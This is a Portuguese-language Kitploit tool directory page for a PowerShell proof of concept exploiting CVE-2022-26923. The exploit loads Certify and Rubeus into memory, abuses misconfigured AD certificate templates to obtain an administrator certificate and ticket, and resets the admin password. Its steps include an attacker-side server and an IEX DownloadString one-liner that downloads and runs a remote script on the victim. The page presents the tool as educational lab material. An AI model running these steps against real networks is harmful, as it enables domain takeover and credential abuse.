Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-26923-Powershell-POC — Um PoC em PowerShell para carregar e executar automaticamente o Certify e o Rubeus a partir da memória. | Kitploit
Ferramentas/GitHubGitHub/lsecqt/cve-2022-26923-powershell-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHublsecqt/cve-2022-26923-powershell-poc

CVE-2022-26923-Powershell-POC

Um PoC em PowerShell para carregar e executar automaticamente o Certify e o Rubeus a partir da memória.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1781há 4 anosAinda não revisado

CVE-2022-26923-Powershell-POC

Um POC em PowerShell para carregar e executar automaticamente o Certify e o Rubeus a partir da memória.

Como funciona?

  1. Carrega o Certify.exe e o Rubeus.exe na memória.
  2. Verifica a máquina alvo em busca de modelos de certificado mal configurados. (mais em https://www.youtube.com/watch?v=HBRCI5O35R8)
  3. Solicita um certificado para o usuário administrativo, com base no modelo vulnerável.
  4. Envia o certificado para o handler de certificados, que o converte para o formato .pfx e o envia de volta ao cliente.
  5. Utiliza o Rubeus para carregar o certificado e gerar um ticket para o usuário administrativo.
  6. Altera a senha do usuário administrativo. (Apenas para a demonstração)

O POC é testado nos seguintes laboratórios TryHackMe: https://tryhackme.com/room/adcertificatetemplates

Este CVE é usado para escalonamento de privilégios, portanto nenhuma exploração inicial é coberta nesta demonstração, nem no laboratório do THM.

Passos:

  1. python3 -m http.server 80 [Máquina do Atacante]
  2. python3 uploader.py 8000 [Máquina do Atacante]
  3. IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Máquina da Vítima]

Nota: Este POC é apenas para fins educacionais; você é responsável pelas suas próprias ações.

Baixar ferramenta